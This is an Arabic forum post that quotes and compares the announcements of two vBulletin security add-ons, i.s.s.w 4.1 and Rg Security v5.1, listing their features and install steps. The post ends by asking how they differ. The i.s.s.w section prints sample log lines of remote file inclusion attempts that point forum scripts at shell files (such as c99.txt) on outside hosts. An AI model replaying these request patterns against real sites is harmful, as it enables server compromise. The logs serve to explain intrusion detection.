بسم الله الرحمن الرحيم
الاول نبداء بى هاك i.s.s.w 4.1
اقتباس:
المشاركة الأصلية أضيفت بواسطة : i.s.s.w (المشاركة : 33830)
السلام عليكم ورحمة الله وبركاته
[align=right]
اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا
نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني
عمل الهاك : حماية المنتدى بشكل كامل بعون الله
[/align]
الخيار الاول : لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
رمز PHP:
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
رمز PHP:
التاريخ والوقت
رمز PHP:
عدد المحاولات
رمز PHP:
ايبي الموقع المصااب
رمز PHP:
الاصابة طبعا تشفرت لاغراض امنيه
رمز PHP:
الاستغلال
رمز PHP:
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
رمز PHP:
الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt
وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي
واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور
مع
تحيات الفريق الامني
الان من لوحت تحكم المنتدي قم برفع البرودكت
تم تجربت المنتج على الاصدار
3.6.x
3.7.0
لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت
يطرحه هنا في الموضوع لنصل لتطوير اكثر
وجل من لا يخطأ وشكرا لكم
لتتبع جديد الهاك على الرابط التالي
http://www.is-sw.net/index.php?issw=isswvb
الحمد لله على كل شيء
لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق
اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم
التحميل لاخر اصدار هنا
تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم
وشكرا لكم
و الان ناتى لى هاك
Rg Security v5.1 Web Premium
اقتباس:
المشاركة الأصلية أضيفت بواسطة : vballetineg.com (المشاركة : 9434028)
وين الفرق
الاول نبداء بى هاك i.s.s.w 4.1
اقتباس:
المشاركة الأصلية أضيفت بواسطة : i.s.s.w (المشاركة : 33830)
السلام عليكم ورحمة الله وبركاته
[align=right]
اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا
نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني
عمل الهاك : حماية المنتدى بشكل كامل بعون الله
[/align]
الخيار الاول : لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
رمز PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
رمز PHP:
,
التاريخ والوقت
رمز PHP:
2007-12-11, 05:50:44,
عدد المحاولات
رمز PHP:
1197370244
ايبي الموقع المصااب
رمز PHP:
209.67.223.188
الاصابة طبعا تشفرت لاغراض امنيه
رمز PHP:
p=11575//codebb/lang_select
الاستغلال
رمز PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
رمز PHP:
libwww-perl/5.808
الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt
وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي
واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور
مع
تحيات الفريق الامني
الان من لوحت تحكم المنتدي قم برفع البرودكت
تم تجربت المنتج على الاصدار
3.6.x
3.7.0
لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت
يطرحه هنا في الموضوع لنصل لتطوير اكثر
وجل من لا يخطأ وشكرا لكم
لتتبع جديد الهاك على الرابط التالي
http://www.is-sw.net/index.php?issw=isswvb
الحمد لله على كل شيء
لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق
اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم
التحميل لاخر اصدار هنا
تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم
وشكرا لكم
و الان ناتى لى هاك
Rg Security v5.1 Web Premium
اقتباس:
المشاركة الأصلية أضيفت بواسطة : vballetineg.com (المشاركة : 9434028)
♦[ بسم الله الرحمن الرحيم ]♦
بعد نجاح المنتج العظيم وعملاق حماية vBulletin منتج Rg Security
تم صدور نسخة البرينيوم
Rg Security v5.1 Premium
وتم اضافة فيها خواص جديدة وممتازة
للاصدارة
vBulletin®3.7.3
| Rg Security For vBulletin v5.1 |
\\===========================//
// Full Security - الحماية الكاملة \\
+============================+
قبل بدأ الشرح أود الإعلان عن برنامج الحماية العربي Rg Security 2009
مبروك الحصول على ترتيب رقم 6
♦[ الخواص الجديدة ]♦
• الحماية من ثغرات Xss
• الحماية من ثغرات Xss في جميع الصفحات وعند تركيب هاك جديد
• الحماية من الفلوود
• الحماية من الاستغلالات HTML
• الحماية من استغلالات SQL
• الحماية من استغلالات PHP
• نظام Power Plus لضغط القوالب
• نظام الكلمات الممنوعة الاضافية
• حماية شريط اخر 10 مواضيع
• حماية الاهداءات
• حماية من اكواد التحويل
• تحذير عند تحميل المرفقان
• الحماية من نسخ المواضيع
• الحماية من الثغرة الخطيرة spacer_open
• الحماية من الاستغلالات المتطورة مع البلاغ
• البلاغ الداخلي لمحاولات الدخول
• حماية كاملة لملف Config.php [جديد]
• حماية كاملة من أساليب الحقن والتلغيم [جديد]
• حماية كاملة من اساليب Xss [تطوير]
• حماية كاملة من استغلالات My Sql [جديد]
المميزات الجديدة :
حجب الروابط في الرسائل الخاصة
مصحح اخطاء Security Token
اخطاء Security Token الموجودة بالنسخ الجديدة
حماية كاملة للمنتدى من الفلوود
حماية كاملة من ثغرات PL
حماية كاملة من ثغرات التصفح الجديدة
عن طريق حماية ثغرات التصفح وثغرات PL
ميزة Ajax Browser للروابط
التفعيل والتعطيل من لوحة التحكم
الحماية من اساليب التلغيم
الحماية من ثغرة Spacer_Open
تم تطوير نظام حماية هذة الثغرة
حماية ملف الكونفق مهما تغير اسمه
تم تطوير اسلوب الحماية بشكل عام
تم تطوير اسلوب حماية متغيرات Config.php
حماية ثغرات التنقل Nobody
حيث تم اضافة اساليب حماية لحماية موقعك من الاختراق
عبر المواقع المخترقة على السيرفر
التطويرات
التعديل على اسلوب الحماية Xss
التعديل على اسلوب الحماية PHP
تطوير Ajax Browser
تطوير طريقة عرض تحذير عند محاولة اختراق
تطوير نظام البلاغ للمحاولات
اضافة ميزة عرض معلومات المخترق
امكانية تغيير صفحة البلاغات
تطوير خاصية البلاغ عن محاولات الدخول
تطوير منع HTML في المواضيع
تطوير حاجب البريد بالرسائل الخاصة
تعديل اسلوب الكشف
والان والمفاجأة
• نظام دخول لوحة التحكم من IP واحد فقط مع البلاغ بالمحاولات
الان نيجي لطريقة التركيب
ارفع مجلد rgfiles
الى مجلد VB
ثم ارفع
cpnav_rgsecurity.xml
الى مسار
includes/xml
بعدين اعطي ملفات
rgfiles/log.txt
ترخيص 666
وكل ملفات الموجودة بمجلد
rgfiles/logs
اعطيها ترخيص 666
ثم ارفع المنتج عبر لوحة التحكم وقم بتفعيل الهاك مع الخيارات
واعطي مجلد المنتدى ترخيص
111
وارفع ملف
403.htm
الى مسار موقعك الاساسي
www
========
خاصية الدخول من IP واحد
================
اذا أردت تشغيلها ضع ملف
.htaccess
في مجلد لوحة التحكم
فقط
والأن شرح لبعض اساليب البلاغ عن محاولات الاختراق ..
1- لضبط إعدادات الهاك اذا كنت تستخدم خاصية IP واحد
3- لعرض اجمالي عدد محاولات الاختراق التي تمت
4- لعرض بيانات محاولات الاختراق
5- الذهاب للموقع الرسمي للهاك
لاي استفسار
moahmedosman@w.cn
=============================
Www.vballetineg.com
للتحميل:
الملف مرفق
بعد نجاح المنتج العظيم وعملاق حماية vBulletin منتج Rg Security
تم صدور نسخة البرينيوم
Rg Security v5.1 Premium
وتم اضافة فيها خواص جديدة وممتازة
للاصدارة
vBulletin®3.7.3
| Rg Security For vBulletin v5.1 |
\\===========================//
// Full Security - الحماية الكاملة \\
+============================+
قبل بدأ الشرح أود الإعلان عن برنامج الحماية العربي Rg Security 2009
مبروك الحصول على ترتيب رقم 6
♦[ الخواص الجديدة ]♦
• الحماية من ثغرات Xss
• الحماية من ثغرات Xss في جميع الصفحات وعند تركيب هاك جديد
• الحماية من الفلوود
• الحماية من الاستغلالات HTML
• الحماية من استغلالات SQL
• الحماية من استغلالات PHP
• نظام Power Plus لضغط القوالب
• نظام الكلمات الممنوعة الاضافية
• حماية شريط اخر 10 مواضيع
• حماية الاهداءات
• حماية من اكواد التحويل
• تحذير عند تحميل المرفقان
• الحماية من نسخ المواضيع
• الحماية من الثغرة الخطيرة spacer_open
• الحماية من الاستغلالات المتطورة مع البلاغ
• البلاغ الداخلي لمحاولات الدخول
• حماية كاملة لملف Config.php [جديد]
• حماية كاملة من أساليب الحقن والتلغيم [جديد]
• حماية كاملة من اساليب Xss [تطوير]
• حماية كاملة من استغلالات My Sql [جديد]
المميزات الجديدة :
حجب الروابط في الرسائل الخاصة
مصحح اخطاء Security Token
اخطاء Security Token الموجودة بالنسخ الجديدة
حماية كاملة للمنتدى من الفلوود
حماية كاملة من ثغرات PL
حماية كاملة من ثغرات التصفح الجديدة
عن طريق حماية ثغرات التصفح وثغرات PL
ميزة Ajax Browser للروابط
التفعيل والتعطيل من لوحة التحكم
الحماية من اساليب التلغيم
الحماية من ثغرة Spacer_Open
تم تطوير نظام حماية هذة الثغرة
حماية ملف الكونفق مهما تغير اسمه
تم تطوير اسلوب الحماية بشكل عام
تم تطوير اسلوب حماية متغيرات Config.php
حماية ثغرات التنقل Nobody
حيث تم اضافة اساليب حماية لحماية موقعك من الاختراق
عبر المواقع المخترقة على السيرفر
التطويرات
التعديل على اسلوب الحماية Xss
التعديل على اسلوب الحماية PHP
تطوير Ajax Browser
تطوير طريقة عرض تحذير عند محاولة اختراق
تطوير نظام البلاغ للمحاولات
اضافة ميزة عرض معلومات المخترق
امكانية تغيير صفحة البلاغات
تطوير خاصية البلاغ عن محاولات الدخول
تطوير منع HTML في المواضيع
تطوير حاجب البريد بالرسائل الخاصة
تعديل اسلوب الكشف
والان والمفاجأة
• نظام دخول لوحة التحكم من IP واحد فقط مع البلاغ بالمحاولات
الان نيجي لطريقة التركيب
ارفع مجلد rgfiles
الى مجلد VB
ثم ارفع
cpnav_rgsecurity.xml
الى مسار
includes/xml
بعدين اعطي ملفات
rgfiles/log.txt
ترخيص 666
وكل ملفات الموجودة بمجلد
rgfiles/logs
اعطيها ترخيص 666
ثم ارفع المنتج عبر لوحة التحكم وقم بتفعيل الهاك مع الخيارات
واعطي مجلد المنتدى ترخيص
111
وارفع ملف
403.htm
الى مسار موقعك الاساسي
www
========
خاصية الدخول من IP واحد
================
اذا أردت تشغيلها ضع ملف
.htaccess
في مجلد لوحة التحكم
فقط
والأن شرح لبعض اساليب البلاغ عن محاولات الاختراق ..
1- لضبط إعدادات الهاك اذا كنت تستخدم خاصية IP واحد
3- لعرض اجمالي عدد محاولات الاختراق التي تمت
4- لعرض بيانات محاولات الاختراق
5- الذهاب للموقع الرسمي للهاك
لاي استفسار
moahmedosman@w.cn
=============================
Www.vballetineg.com
للتحميل:
الملف مرفق
وين الفرق